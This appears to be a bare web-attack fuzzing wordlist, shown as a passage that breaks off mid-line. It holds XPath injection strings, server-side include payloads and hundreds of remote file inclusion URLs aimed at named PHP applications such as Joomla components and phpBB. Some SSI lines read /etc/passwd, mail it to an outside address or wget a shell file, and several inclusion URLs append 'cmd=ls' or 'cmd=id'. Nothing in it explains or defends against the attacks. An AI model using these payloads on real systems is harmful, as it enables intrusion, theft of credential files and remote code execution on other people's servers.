exit;/*</name>\n0\n0.00005\n0.1\n0.9\n1\n-1\n1.7976931348623157e+308\n5e-10\n5e-324\ncount(/child::node())\nfalse\nnull\ntrue\nx' or 1=1 or 'x'='y\nx' or name()='username' or 'x'='y\n<!--#config errmsg=\"File not found, informs users and password\"-->\n<!--#config timefmt=\"A %B %d %Y %r\"-->\n<!--#echo var=\"auth_type\" -->\n<!--#echo var=\"content_length\" -->\n<!--#echo var=\"content_type\" -->\n<!--#echo var=\"date_gmt\" -->\n<!--#echo var=\"date_local\" -->\n<!--#echo var=\"DATE_LOCAL\" -->\n<!--#echo var=\"document_name\" -->\n<!--#echo var=\"DOCUMENT_NAME\" -->\n<!--#echo var=\"document_root\" -->\n<!--#echo var=\"document_uri\" -->\n<!--#echo var=\"DOCUMENT_URI\" -->\n<!--#echo var=\"forwarded\" -->\n<!--#echo var=\"from\" -->\n<!--#echo var=\"gateway_interface\" -->\n<!--#echo var=\"http_accept\" -->\n<!--#echo var=\"http_accept_charset\" -->\n<!--#echo var=\"http_accept_encoding\" -->\n<!--#echo var=\"http_accept_language\" -->\n<!--#echo var=\"http_client_ip\" -->\n<!--#echo var=\"http_connection\" -->\n<!--#echo var=\"http_cookie\" -->\n<!--#echo var=\"http_form\" -->\n<!--#echo var=\"http_host\" -->\n<!--#echo var=\"http_referer\" -->\n<!--#echo var=\"http_ua_cpu\" -->\n<!--#echo var=\"http_ua_os\" -->\n<!--#echo var=\"http_user_agent\" -->\n<!--#echo var=\"last_modified\" -->\n<!--#echo var=\"netsite_root\" -->\n<!--#echo var=\"page_count\" -->\n<!--#echo var=\"path\" -->\n<!--#echo var=\"path_info\" -->\n<!--#echo var=\"path_info_translated\" -->\n<!--#echo var=\"path_translated\" -->\n<!--#echo var=\"query_string\" -->\n<!--#echo var=\"query_string_unescaped\" -->\n<!--#echo var=\"remote_addr\" -->\n<!--#echo var=\"remote_host\" -->\n<!--#echo var=\"remote_ident\" -->\n<!--#echo var=\"remote_port\" -->\n<!--#echo var=\"remote_user\" -->\n<!--#echo var=\"request_method\" -->\n<!--#echo var=\"request_uri\" -->\n<!--#echo var=\"script_filename\" -->\n<!--#echo var=\"script_name\" -->\n<!--#echo var=\"script_uri\" -->\n<!--#echo var=\"script_url\" -->\n<!--#echo var=\"server_addr\" -->\n<!--#echo var=\"server_admin\" -->\n<!--#echo var=\"server_name -->\n<!--#echo var=\"server_port\" -->\n<!--#echo var=\"server_protocol\" -->\n<!--#echo var=\"server_software\" -->\n<!--#echo var=\"site_htmlroot\" -->\n<!--#echo var=\"total_hits\" -->\n<!--#echo var=\"tz\" -->\n<!--#echo var=\"unique_id\" -->\n<!--#echo var=\"user_name\" -->\n<!--#exec cmd=\"/bin/ls /\" -->\n<!--#exec cmd=\"/bin/ls /\" --><br/>\n<!--#exec cmd=\"cat /etc/passwd\" --><br/>\n<!--#exec cmd=\"cd C:\\WINDOWS\\System32\">\n<!--#exec cmd=\"dir\" -->\n<!--#exec cmd=\"find / -name *.* -print\" --><br/>\n<!--#exec cmd=\"ls\" -->\n<!--#exec cmd=\"mail email@dom.tld <mailto:email@dom.tld> < cat /etc/passwd\" --><br/>\n<!--#exec cmd=\"wget http://website.com/dir/shell.txt\" -->\n<!--#exec cmd=\"whoami\"-->\n<!--#flastmod virtual=\"echo.html\" -->\n<!--#fsize file=\"ssi.shtml\" -->\n<!--#include file=?UUUUUUUU...UU?-->\n<!--#printenv -->\n<pre><!--#echo var=\"DATE_LOCAL\" --> </pre>\n<pre><!--#exec cmd=\"dir\" --></pre>\n<pre><!--#exec cmd=\"ls\" --></pre>\n<pre><!--#exec cmd=\"whoami\"--></pre>\n/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?\n/123flashchat.php?e107path=XXpathXX\n/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX\n/22_ultimate/templates/header.php?mainpath=XXpathXX\n/22_ultimate/templates/header.php?mainpath=XXpathXX?\n/=XXpathXX\n/?_CONFIG[files][functions_page]=XXpathXX\n/?npage=-1&content_dir=XXpathXX%00&cmd=ls\n/?npage=1&content_dir=XXpathXX%00&cmd=ls\n/?show=XXpathXX?\n/A-Blog/navigation/donation.php?navigation_start=XXpathXX\n/A-Blog/navigation/latestnews.php?navigation_start=XXpathXX?\n/A-Blog/navigation/links.php?navigation_start=XXpathXX?\n/A-Blog/navigation/search.php?navigation_end=XXpathXX?\n/A-Blog/sources/myaccount.php?open_box=XXpathXX?\n/ACGVnews/header.php?PathNews=XXpathXX\n/ATutor/documentation/common/frame_toc.php?section=XXpathXX\n/ATutor/documentation/common/search.php?section=XXpathXX\n/ATutor/documentation/common/vitals.inc.php?req_lang=XXpathXX\n/ATutor/include/classes/module/module.class.php?row[dir_name]=XXpathXX\n/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=XXpathXX\n/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=XXpathXX?\n/Administration/Includes/configureText.php?path_prefix=XXpathXX\n/Administration/Includes/contentHome.php?path_prefix=XXpathXX\n/Administration/Includes/deleteContent.php?path_prefix=XXpathXX\n/Administration/Includes/deleteUser.php?path_prefix=XXpathXX\n/Administration/Includes/userHome.php?path_prefix=XXpathXX\n/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=XXpathXX?\n/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=XXpathXX?\n/BE_config.php?_PSL[classdir]=XXpathXX\n/BPNEWS/bn_smrep1.php?bnrep=XXpathXX?&\n/Base/Application.php?pear_dir=XXpathXX\n/Bcwb_PATH/dcontent/default.css.php?root_path_admin=XXpathXX\n/Bcwb_PATH/include/startup.inc.php?root_path_admin=XXpathXX\n/Bcwb_PATH/system/default.css.php?root_path_admin=XXpathXX\n/Beautifier/Core.php?BEAUT_PATH=XXpathXX?\n/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX\n/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX\n/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX\n/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX\n/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=XXpathXX\n/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX\n/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX\n/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX\n/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX\n/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX\n/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX\n/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=XXpathXX\n/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX\n/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX\n/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX\n/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX\n/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX\n/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX\n/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=XXpathXX\n/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX\n/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX\n/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX\n/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX\n/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX\n/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX\n/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX\n/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX\n/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=XXpathXX\n/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX\n/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX\n/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX\n/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX\n/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX\n/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX\n/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX\n/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX\n/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX\n/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX\n/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX\n/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX\n/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=XXpathXX\n/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX\n/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX\n/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX\n/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX\n/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX\n/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX\n/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX\n/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX\n/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX\n/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX\n/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX\n/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX\n/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=XXpathXX\n/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX\n/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX\n/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=XXpathXX\n/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX\n/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin\n/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=XXpathXX\n/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=XXpathXX?\n/CheckUpload.php?Language=XXpathXX&cmd=ls\n/Contenido_4.8.4/contenido/backend_search.php?contenido_path=XXpathXX?\n/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=XXpathXX?\n/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=XXpathXX?\n/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=XXpathXX?\n/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=XXpathXX?\n/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=XXpathXX?\n/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=XXpathXX?\n/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=XXpathXX?\n/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=XXpathXX?\n/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=XXpathXX?\n/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=XXpathXX?\n/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=XXpathXX?\n/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=XXpathXX?\n/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=XXpathXX?\n/CoupleDB.php?Parametre=0&DataDirectory=XXpathXX?\n/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=XXpathXX\n/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=XXpathXX\n/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=XXpathXX\n/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=XXpathXX\n/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=XXpathXX\n/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=XXpathXX\n/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=XXpathXX\n/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]XXpathXX\n/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=XXpathXX\n/DON3/applications/frontpage.don3app/frontpage.php?app_path=XXpathXX?\n/Dir_phNNTP/article-raw.php?file_newsportal=XXpathXX?\n/DynaTracker_v151/action.php?base_path=XXpathXX\n/DynaTracker_v151/includes_handler.php?base_path=XXpathXX\n/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=XXpathXX?\n/Ex/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?\n/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=XXpathXX?\n/Exophpdesk_PATH/pipe.php?lang_file=XXpathXX\n/FirstPost/block.php?Include=XXpathXX\n/Flickrclient.php?path_prefix=XXpathXX\n/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=XXpathXX?\n/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=XXpathXX?\n/Full_Release/include/body_comm.inc.php?content=XXpathXX\n/Gallery/displayCategory.php?basepath=XXpathXX\n/Include/lib.inc.php3?Include=XXpathXX?\n/Include/variables.php3?Include=XXpathXX?\n/Jobline/admin.jobline.php?mosConfig_absolute_path=XXpathXX\n/ListRecords.php?lib_dir=XXpathXX?&cmd=id\n/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=XXpathXX\n/MOD_forum_fields_parse.php?phpbb_root_path=XXpathXX\n/Mamblog/admin.mamblog.php?cfgfile=XXpathXX\n/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=XXpathXX?\n/NuclearBB/tasks/send_queued_emails.php?root_path=XXpathXX?\n/OpenSiteAdmin/indexFooter.php?path=XXpathXX%00\n/OpenSiteAdmin/pages/pageHeader.php?path=XXpathXX?\n/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=XXpathXX%00\n/OpenSiteAdmin/scripts/classes/FieldManager.php?path=XXpathXX%00\n/OpenSiteAdmin/scripts/classes/Filter.php?path=XXpathXX%00\n/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=XXpathXX%00\n/OpenSiteAdmin/scripts/classes/Form.php?path=XXpathXX%00\n/OpenSiteAdmin/scripts/classes/FormManager.php?path=XXpathXX%00\n/OpenSiteAdmin/scripts/classes/LoginManager.php?path=XXpathXX%00\n/PHP/includes/header.inc.php?root=XXpathXX?\n/PHPDJ_v05/dj/djpage.php?page=XXpathXX?\n/PaTh/index.php?rootpath=XXpathXX\n/Path_Script/createurl.php?formurl=XXpathXX\n/PhotoCart/adminprint.php?admin_folder=XXpathXX\n/Picssolution/install/config.php?path=XXpathXX?\n/RGboard/include/footer.php?_path[counter]=XXpathXX?\n/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=XXpathXX?\n/SQuery/lib/gore.php?libpath=XXpathXX\n/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=XXpathXX?\n/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=XXpathXX?\n/ScriptPage/source/includes/load_forum.php?mfh_root_path=XXpathXX\n/ScriptPath/footers.php?tinybb_footers=XXpathXX\n/ScriptPath/index.php?page=XXpathXX\n/Script_Path/config.inc.php?_path=XXpathXX?\n/Scripts/app_and_readme/navigator/index.php?page=XXpathXX\n/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=XXpathXX\n/Somery/team.php?checkauth=XXpathXX\n/Upload/install.php?skindir=XXpathXX\n/Widgets/Base/Footer.php?sys_dir=XXpathXX\n/Widgets/Base/widget.BifContainer.php?sys_dir=XXpathXX\n/Widgets/Base/widget.BifRoot.php?sys_dir=XXpathXX\n/Widgets/Base/widget.BifRoot2.php?sys_dir=XXpathXX\n/Widgets/Base/widget.BifRoot3.php?sys_dir=XXpathXX\n/Widgets/Base/widget.BifWarning.php?sys_dir=XXpathXX\n/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=XXpathXX?\n/[path]/mybic_server.php?file=XXpathXX\n/[path]/previewtheme.php?theme=1&inc_path=XXpathXX?cmd\n/_administration/securite.php?cfg[document_uri]=XXpathXX\n/_blogadata/include/struct_admin.php?incl_page=XXpathXX?\n/_conf/_php-core/common-tpl-vars.php?admindir=XXpathXX\n/_connect.php?root=XXpathXX\n/_friendly/core/data/_load.php?friendly_path=XXpathXX\n/_friendly/core/data/yaml.inc.php?friendly_path=XXpathXX\n/_friendly/core/display/_load.php?friendly_path=XXpathXX\n/_friendly/core/support/_load.php?friendly_path=XXpathXX\n/_functions.php?prefix=XXpathXX\n/_includes/settings.inc.php?approot=XXpathXX\n/_theme/breadcrumb.php?rootBase=XXpathXX\n/_wk/wk_lang.php?WK[wkPath]=XXpathXX\n/abf_js.php?abs_pfad=XXpathXX?&cmd=id\n/about.php?CONFIG[MWCHAT_Libs]=XXpathXX?\n/about.php?bibtexrootrel=XXpathXX?\n/aboutinfo.php?bibtexrootrel=XXpathXX?\n/acc.php?page=XXpathXX\n/access/login.php?path_to_root=XXpathXX\n/account.php?insPath=XXpathXX\n/accsess/login.php?path_to_root=XXpathXX\n/active/components/xmlrpc/client.php?c[components]=XXpathXX\n/ad_main.php?_mygamefile=XXpathXX\n/add.cgi.php?blog_theme=XXpathXX\n/add_link.php?blog_theme=XXpathXX\n/addpost_newpoll.php?addpoll=preview&thispath=XXpathXX\n/addressbook.php?GLOBALS[basedir]=XXpathXX?\n/addsite.php?returnpath=XXpathXX\n/addvip.php?msetstr[\"PROGSDIR\"]=XXpathXX\n/adm/krgourl.php?DOCUMENT_ROOT=XXpathXX?\n/adm/my_statistics.php?DOCUMENT_ROOT=XXpathXX?\n/admin.loudmouth.php?mainframe=XXpathXX\n/admin.php?Madoa=XXpathXX?\n/admin.php?cal_dir=XXpathXX\n/admin.php?env_dir=XXpathXX\n/admin.php?lang=XXpathXX\n/admin.php?page[path]=XXpathXX?&cmd=ls\n/admin.php?submit=submit&form_include_template=XXpathXX\n/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin\n/admin/ST_countries.php?include_path=XXpathXX?\n/admin/ST_platforms.php?include_path=XXpathXX?\n/admin/addentry.php?phpbb_root_path=XXpathXX?\n/admin/addons/archive/archive.php?adminfolder=XXpathXX\n/admin/admin.php?path=XXpathXX\n/admin/admin.php?site_url=XXpathXX\n/admin/admin_forgotten_password.php?root_folder_path=XXpathXX\n/admin/admin_news_bot.php?root_path=XXpathXX?\n/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=XXpathXX\n/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=XXpathXX\n/admin/admin_users.php?phpbb_root_path=XXpathXX\n/admin/auth.php?xcart_dir=XXpathXX?\n/admin/auth/secure.php?cfgProgDir=XXpathXX?\n/admin/autoprompter.php?CONFIG[BASE_PATH]=XXpathXX\n/admin/bin/patch.php?INSTALL_FOLDER=XXpathXX\n/admin/catagory.php?language=XXpathXX\n/admin/classes/pear/OLE/PPS.php?homedir=XXpathXX\n/admin/classes/pear/OLE/PPS/File.php?homedir=XXpathXX\n/admin/classes/pear/OLE/PPS/Root.php?homedir=XXpathXX\n/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=XXpathXX\n/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=XXpathXX\n/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=XXpathXX\n/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=XXpathXX\n/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=XXpathXX\n/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=XXpathXX\n/admin/code/index.php?load_page=XXpathXX\n/admin/comment.php?config[installdir]=XXpathXX\n/admin/common-menu.php?CONF[local_path]=XXpathXX\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=XXpathXX?\n/admin/config_settings.tpl.php?include_path=XXpathXX?&cmd=id\n/admin/directory.php?config[installdir]=XXpathXX\n/admin/doeditconfig.php?thispath=../includes&config[path]=XXpathXX\n/admin/frontpage_right.php?loadadminpage=XXpathXX\n/admin/header.php?loc=XXpathXX\n/admin/inc/add.php?format_menue=XXpathXX\n/admin/inc/change_action.php?format_menue=XXpathXX\n/admin/include/common.php?commonIncludePath=XXpathXX?\n/admin/include/header.php?repertoire=XXpathXX?\n/admin/include/lib.module.php?mod_root=XXpathXX\n/admin/includes/admin_header.php?level=XXpathXX?\n/admin/includes/author_panel_header.php?level=XXpathXX?\n/admin/includes/header.php?bypass_installed=1&secure_page_path=XXpathXX%00\n/admin/includes/spaw/spaw_control.class.php?spaw_root=XXpathXX?\n/admin/index.php?path_to_script=XXpathXX?&cmd=ls\n/admin/index.php?pg=XXpathXX?\n/admin/index.php?xtrphome=XXpathXX\n/admin/index_sitios.php?_VIEW=XXpathXX\n/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=XXpathXX\n/admin/login.php?absolute_path=XXpathXX\n/admin/news.admin.php?path_to_script=XXpathXX?&cmd=ls\n/admin/news.php?language=XXpathXX\n/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=XXpathXX\n/admin/sendmsg.php?config[installdir]=XXpathXX\n/admin/setup/level2.php?dir=XXpathXX\n/admin/system/config/conf-activation.php?site_path=XXpathXX\n/admin/system/include.php?skindir=XXpathXX\n/admin/system/include.php?start=1&skindir=XXpathXX\n/admin/system/menu/item.php?site_path=XXpathXX\n/admin/system/modules/conf_modules.php?site_path=XXpathXX\n/admin/templates/template_thumbnail.php?thumb_template=XXpathXX\n/admin/testing/tests/0004_init_urls.php?init_path=XXpathXX?&\n/admin/themes.php?config[installdir]=XXpathXX\n/admin/tools/utf8conversion/index.php?path=XXpathXX?\n/admin/user_user.php?language=XXpathXX\n/admincp/auth/checklogin.php?cfgProgDir=XXpathXX\n/admincp/auth/secure.php?cfgProgDir=XXpathXX\n/adminhead.php?path[docroot]=XXpathXX\n/admini/admin.php?INC=XXpathXX?\n/admini/index.php?INC=XXpathXX?\n/administrator/admin.php?site_absolute_path=XXpathXX?\n/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=XXpathXX\n/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=XXpathXX\n/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=XXpathXX\n/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=XXpathXX\n/administrator/components/com_color/admin.color.php?mosConfig_live_site=XXpathXX?\n/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=XXpathXX\n/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=XXpathXX\n/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=XXpathXX?\n/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=XXpathXX\n/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=XXpathXX\n/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=XXpathXX\n/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=XXpathXX\n/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=XXpathXX\n/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_jreactions/langset.php?comPath=XXpathXX?\n/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=XXpathXX?\n/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=XXpathXX\n/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=XXpathXX\n/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_swmenupro/